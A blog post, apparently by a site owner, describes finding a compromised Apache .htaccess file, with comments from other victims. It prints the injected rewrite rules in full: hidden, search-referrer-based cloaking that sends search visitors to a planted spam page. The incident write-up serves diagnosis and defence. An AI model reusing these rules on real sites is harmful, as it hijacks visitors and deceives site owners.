Apache Criminals

So the problem is solved. Huzzah and hoorah.

But it’s a weird one. Someone pointed out that, after a bit of packet sniffing, it looked like the dodgy pages actually originated from the genuine IP address. So while the first reaction of any technologist is to blame everyone and anyone else maybe, just maybe, that was a little hasty.

So, out comes PuTTY, and a quick scan of the root directory for that domain later and … that’s odd. The .htaccess file has been changed way more recently than I might have expected (and it’s a little bigger).

8 -rw-r--r-- 1 lowfield users 4961 Oct 24 00:46 .htaccess

Odd, though, because the permissions should make it that it’s only me that can write to that file (644).

But there it is, hidden away padded by loads of whitespace:

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /ctte/elire/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

For the benefit of those not fluent in the arcane ways of RegExp and the Apache RewriteEngine, this was basically checking to see if you’d come from a search engine and, if you had, delivering a different page (although only in 90% of instances).

Most times when you click on a link, your browser tells the new website where you came from, known as the REFERRER tag, so this was using that to determine whether to do it. This meant that if people typed in the address, like regular users would, or used a bookmark, they would probably miss the redirection and be none the wiser.

And, to compound the ignominy, it had even written the guilty dodgy page on the local machine and hidden it in a sub-directory off the main directory. So it really was my site to blame.

Seems like I wasn’t the only one either, this is a very similar description and whaddya know,

Apache Criminals

3 thoughts on “Apache Criminals

  1. Romano says:

    Hi Chris,
    On our site we encountered the same problem. I found your blog by googling on the ip address you mention in the problem statement. Took us a few days to figure out what happened. And as you say, we’d very much like to know how in the h^&%ll they changed our htaccess file?!?! Besides that they also changed a number of javascript files where they also included a redirect to this spam site of theirs. Did you ever find out how these hackers entered your site?

    Also noticed that when the spam site loaded it showed in the status bas a reference to peakclick.com, apparently an organization offering affiliate earnings. I called them in vienna, the girl on the phone said someone would call me back, but alas, no answer yet…

    Very anxious to learn more on how to close the door on these folks for good.

    Best regards,
    Romano

    Like

  2. ecbb says:

    Hey there guys. Same problem on my site. Found it in the htaccess file. Left with question: how did this happen? what was compromised?

    Ever figure it out?

    Like

  3. Romano says:

    These f%^&cks have returned now a few days in a row, messing up other stuff each time. Don’t forget to check for new folders, hacked css/javascript files.

    Meanwhile we’re working on it.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s